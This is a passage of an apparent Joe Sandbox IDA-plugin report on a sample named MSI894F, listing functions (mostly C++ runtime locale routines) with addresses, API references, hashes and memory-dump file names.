Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: b4878df796a0cc7a3ccc8d5d2d36ef34179fca38dd48322fc093b5fa2b6faedd
Instruction ID: 0ddb8c8648d2ea0d2e5fede567e089753d5f215faa220a171375530d229a4474
Opcode Fuzzy Hash: b4878df796a0cc7a3ccc8d5d2d36ef34179fca38dd48322fc093b5fa2b6faedd
Instruction Fuzzy Hash: 2341AE71900659EFCF11CF58D844BAEBBB4FB05724F184669E811A7391D730AE45CBB1

Function 00D47C30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010,00000010,?,00D47912,?,?), ref: 00D47C37

Strings

Call to ShellExecuteEx() returned:, xrefs: 00D47C5D
Last error=, xrefs: 00D47CC1
false, xrefs: 00D47C46
true, xrefs: 00D47C41

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ErrorLast
String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
API String ID: 1452528299-1782174991
Opcode ID: f80ac89e68e2d4b88ff9d0e88555bff8c63183d6ae1d0da58b854b46f7747de4
Instruction ID: ecac81ab1e7142dc218b29682184077a3c2000881277c7f6c04c6810afb53e62
Opcode Fuzzy Hash: f80ac89e68e2d4b88ff9d0e88555bff8c63183d6ae1d0da58b854b46f7747de4
Instruction Fuzzy Hash: AF215949A2026286CF701F7C8540336A2F0EF54B59F6A186FE8C8D7390E7698CC283A0

Function 00D56FF9 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 00D57019
_Maklocstr.LIBCPMT ref: 00D57036
_Maklocstr.LIBCPMT ref: 00D57053
_Maklocchr.LIBCPMT ref: 00D57065
_Maklocchr.LIBCPMT ref: 00D57078

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: c4e6f1470b688afaeaeb04a310d27a493f7f162391a99fe8e47bfd77d9c0c6a7
Instruction ID: 1159e02a426f92a73d02f0bd8d8c5126dfb817f41e2a28b32ce283074107a22c
Opcode Fuzzy Hash: c4e6f1470b688afaeaeb04a310d27a493f7f162391a99fe8e47bfd77d9c0c6a7
Instruction Fuzzy Hash: 14118FB1504744BBEB20DBA5A881F12B7ECFF09355F18051AFA85CBA81D265FC5887B4

Function 00D52823 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D5282A
std::_Lockit::_Lockit.LIBCPMT ref: 00D52834

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

numpunct.LIBCPMT ref: 00D5286E
std::_Facet_Register.LIBCPMT ref: 00D52885
std::_Lockit::~_Lockit.LIBCPMT ref: 00D528A5

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID:
API String ID: 743221004-0
Opcode ID: 86c91169a60124442d968a941ea795d283d93d3dd831bb8d853f7b704ecfd566
Instruction ID: 5db7d69fc334db4aaf76fd82c9d22ea8d1f0fa54f8a7afebda47b9851640e344
Opcode Fuzzy Hash: 86c91169a60124442d968a941ea795d283d93d3dd831bb8d853f7b704ecfd566
Instruction Fuzzy Hash: 6711E1359002198BCF05EBB4D8566BE7BA1EF91B21F280109FC11AB391DF749E098BB1

Function 00D58030 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D58037
std::_Lockit::_Lockit.LIBCPMT ref: 00D58041

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

numpunct.LIBCPMT ref: 00D5807B
std::_Facet_Register.LIBCPMT ref: 00D58092
std::_Lockit::~_Lockit.LIBCPMT ref: 00D580B2

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID:
API String ID: 743221004-0
Opcode ID: 5234f6cc80e8fc5f3204840c5c1e4654a436ebceae635c128c06004cb9d7a5eb
Instruction ID: f379558200b5301a539ec5b2416133ff7f042e452ae9068b84dff7423f0f8f4e
Opcode Fuzzy Hash: 5234f6cc80e8fc5f3204840c5c1e4654a436ebceae635c128c06004cb9d7a5eb
Instruction Fuzzy Hash: 8801C436900219CBCF01EBA8D8566AE7761EF84311F140109FC10A73D2DF749E099BB1

Function 00D575B6 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D575BD
std::_Lockit::_Lockit.LIBCPMT ref: 00D575C7

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

codecvt.LIBCPMT ref: 00D57601
std::_Facet_Register.LIBCPMT ref: 00D57618
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57638

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 515ae7211a9dedd60ea5b222ed22c2228ddf9ba40cd8726bc4a317d8d6a0f62f
Instruction ID: 4dea48647e767df182da536ecc4e99a8002ed4f4f5304da6cce2855e6cffa6f4
Opcode Fuzzy Hash: 515ae7211a9dedd60ea5b222ed22c2228ddf9ba40cd8726bc4a317d8d6a0f62f
Instruction Fuzzy Hash: 2E01C4759046199BCF01EF78E8556AD7761EF84322F240109EC11AB392DF74DE05CBB4

Function 00D576E0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D576E7
std::_Lockit::_Lockit.LIBCPMT ref: 00D576F1

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

collate.LIBCPMT ref: 00D5772B
std::_Facet_Register.LIBCPMT ref: 00D57742
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57762

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: 1923c0fb71088958079214af0c7bba325bc10b43d2bab3fefe4505ab8bcd2b87
Instruction ID: aaf9064974e76e56887111ce9f5e5c19645266535bbb88fc5f11a8e8a579e1b9
Opcode Fuzzy Hash: 1923c0fb71088958079214af0c7bba325bc10b43d2bab3fefe4505ab8bcd2b87
Instruction Fuzzy Hash: 7B01C0759042199BCF01EB64E8566AE77A1EF84321F280109EC21AB392DF749E099BB0

Function 00D5764B Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57652
std::_Lockit::_Lockit.LIBCPMT ref: 00D5765C

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

codecvt.LIBCPMT ref: 00D57696
std::_Facet_Register.LIBCPMT ref: 00D576AD
std::_Lockit::~_Lockit.LIBCPMT ref: 00D576CD

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 918979843e56a25a2e79866c18ee8d7adc2d394fe5894c30b98fc221f9e50f02
Instruction ID: 7dc085d21cf18923ecdb4d556d345a3556ed35082fa7936e1fd8197a6787baea
Opcode Fuzzy Hash: 918979843e56a25a2e79866c18ee8d7adc2d394fe5894c30b98fc221f9e50f02
Instruction Fuzzy Hash: BE01C075910A198BCF01FB78E8566BD77A1EF84322F280009EC10AB391DF74DE059BB5

Function 00D52664 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D5266B
std::_Lockit::_Lockit.LIBCPMT ref: 00D52675

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

codecvt.LIBCPMT ref: 00D526AF
std::_Facet_Register.LIBCPMT ref: 00D526C6
std::_Lockit::~_Lockit.LIBCPMT ref: 00D526E6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: fd3a13c3c7ee705041992cdda8f155d9b9b8db401ad889df771e5090979d0726
Instruction ID: 6ee2b5ec275d8c5d49f809cf1439c4df7702678907ed541b061e4a3aea413566
Opcode Fuzzy Hash: fd3a13c3c7ee705041992cdda8f155d9b9b8db401ad889df771e5090979d0726
Instruction Fuzzy Hash: BE01C4319002199BCF05EB64D8556BE77A1EF81321F290109EC10AB391DF749E099BB0

Function 00D57775 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D5777C
std::_Lockit::_Lockit.LIBCPMT ref: 00D57786

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

collate.LIBCPMT ref: 00D577C0
std::_Facet_Register.LIBCPMT ref: 00D577D7
std::_Lockit::~_Lockit.LIBCPMT ref: 00D577F7

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: a2cb45818e1453709425414d9cd1e6d8a9845cdac4b6efa661637c9a14dcc4da
Instruction ID: 0c1b8b1d040c891f3127d57a1768458aacb1a693fe4aec97cb13511af14f596e
Opcode Fuzzy Hash: a2cb45818e1453709425414d9cd1e6d8a9845cdac4b6efa661637c9a14dcc4da
Instruction Fuzzy Hash: C701C0759442199BCF01EB64E8566AE77B1EF84321F28054AEC11AB3D2DF749E058BB0

Function 00D638C1 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D638C8
std::_Lockit::_Lockit.LIBCPMT ref: 00D638D2

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

collate.LIBCPMT ref: 00D6390C
std::_Facet_Register.LIBCPMT ref: 00D63923
std::_Lockit::~_Lockit.LIBCPMT ref: 00D63943

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: 37c07535e3e10a8e40eac2ac9a70b7bcdd3c9b76f59f4268937449b5741607af
Instruction ID: 3e393337891ac9ea9c55629b59984f92e2d3daeada18a04c629d39cc5d25eb76
Opcode Fuzzy Hash: 37c07535e3e10a8e40eac2ac9a70b7bcdd3c9b76f59f4268937449b5741607af
Instruction Fuzzy Hash: B60184759002199BCB05EB64D8556AEB765EF84720F24050AF910AB391DFB49E058FB4

Function 00D5789F Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D578A6
std::_Lockit::_Lockit.LIBCPMT ref: 00D578B0

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

messages.LIBCPMT ref: 00D578EA
std::_Facet_Register.LIBCPMT ref: 00D57901
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57921

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: 3ea5ed22514018c83228e47ce784b8aa2b094fcc76058bf7526d0de82bb3f15a
Instruction ID: 66122115341a01edac58435f5c93fced17b0b8989a898edc3c197f3b8140aea8
Opcode Fuzzy Hash: 3ea5ed22514018c83228e47ce784b8aa2b094fcc76058bf7526d0de82bb3f15a
Instruction Fuzzy Hash: EE01C0359002198BCF05FB64E8566AE77A1EF84321F380509FC11AB392DF749E05CBB0

Function 00D5780A Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57811
std::_Lockit::_Lockit.LIBCPMT ref: 00D5781B

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

ctype.LIBCPMT ref: 00D57855
std::_Facet_Register.LIBCPMT ref: 00D5786C
std::_Lockit::~_Lockit.LIBCPMT ref: 00D5788C

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
String ID:
API String ID: 83828444-0
Opcode ID: e58269269d27917b568d5e27783466bd00ded1dafc1c9db8f05436c361f8561b
Instruction ID: 047a4f3cf855bd7c5851662aa2ddf146777a577384f183816b07b7e67d66330e
Opcode Fuzzy Hash: e58269269d27917b568d5e27783466bd00ded1dafc1c9db8f05436c361f8561b
Instruction Fuzzy Hash: D501C0759042198BCF05EB64E85A6AD7BA1EF84322F28050AEC11AB3D1DF749E05CBB0

Function 00D63956 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D6395D
std::_Lockit::_Lockit.LIBCPMT ref: 00D63967

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

messages.LIBCPMT ref: 00D639A1
std::_Facet_Register.LIBCPMT ref: 00D639B8
std::_Lockit::~_Lockit.LIBCPMT ref: 00D639D8

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: 998defbd96c94f701037d8dc053d6392a04f918d0dac0dd065da2cc59acc8ff8
Instruction ID: 038bcbc429796b8d2222413d415110775eab8118ef838fec28beadc5d98c7daa
Opcode Fuzzy Hash: 998defbd96c94f701037d8dc053d6392a04f918d0dac0dd065da2cc59acc8ff8
Instruction Fuzzy Hash: FA01CC319006199BCB01EB64D8566AEB7B5EF81320F29040AE810AB3D1DFB49F05CFB0

Function 00D57934 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D5793B
std::_Lockit::_Lockit.LIBCPMT ref: 00D57945

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

messages.LIBCPMT ref: 00D5797F
std::_Facet_Register.LIBCPMT ref: 00D57996
std::_Lockit::~_Lockit.LIBCPMT ref: 00D579B6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: 692bf89b6e049ecdc18d92235b40cf18192eacb0df85968b446a9a1cf7a48f58
Instruction ID: e65dc293c24a2f77c0b5d8036be85dd0ceaa7cb30ee46b76f58543c2f71b401f
Opcode Fuzzy Hash: 692bf89b6e049ecdc18d92235b40cf18192eacb0df85968b446a9a1cf7a48f58
Instruction Fuzzy Hash: 3601C0719042198BCF01EB68E9566AE77A1EF80321F280509FC10AB3D1CF749E058FB1

Function 00D63BAA Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D63BB1
std::_Lockit::_Lockit.LIBCPMT ref: 00D63BBB

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

moneypunct.LIBCPMT ref: 00D63BF5
std::_Facet_Register.LIBCPMT ref: 00D63C0C
std::_Lockit::~_Lockit.LIBCPMT ref: 00D63C2C

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 8106e77089f8da985fa1f10eefedbf2a51d795d2d3ca060c0cb14f32db509415
Instruction ID: bf0140a814d04774d7e6f93ed26a4231951673441553fd1092f479407dd63712
Opcode Fuzzy Hash: 8106e77089f8da985fa1f10eefedbf2a51d795d2d3ca060c0cb14f32db509415
Instruction Fuzzy Hash: 8901C0759002199BCB05EF64D9566AD77A1EF84320F290509F810AB3D2CF74DE018BB0

Function 00D63B15 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D63B1C
std::_Lockit::_Lockit.LIBCPMT ref: 00D63B26

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

moneypunct.LIBCPMT ref: 00D63B60
std::_Facet_Register.LIBCPMT ref: 00D63B77
std::_Lockit::~_Lockit.LIBCPMT ref: 00D63B97

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 94d2814158d29ef9fd0824bbc0af6dda9ff4b57665cfb3c0e34410da226b6a6f
Instruction ID: ba8592be9119516de242097412987cccf9633b2aaab6614761c4e37ec4f69535
Opcode Fuzzy Hash: 94d2814158d29ef9fd0824bbc0af6dda9ff4b57665cfb3c0e34410da226b6a6f
Instruction Fuzzy Hash: 1901CC719002199BCF01EF68D8566AEB7A1EF84320F29000AE814AB3D2CF74DE018BB0

Function 00D57CB2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D57CB9
std::_Lockit::_Lockit.LIBCPMT ref: 00D57CC3

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

moneypunct.LIBCPMT ref: 00D57CFD
std::_Facet_Register.LIBCPMT ref: 00D57D14
std::_Lockit::~_Lockit.LIBCPMT ref: 00D57D34

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
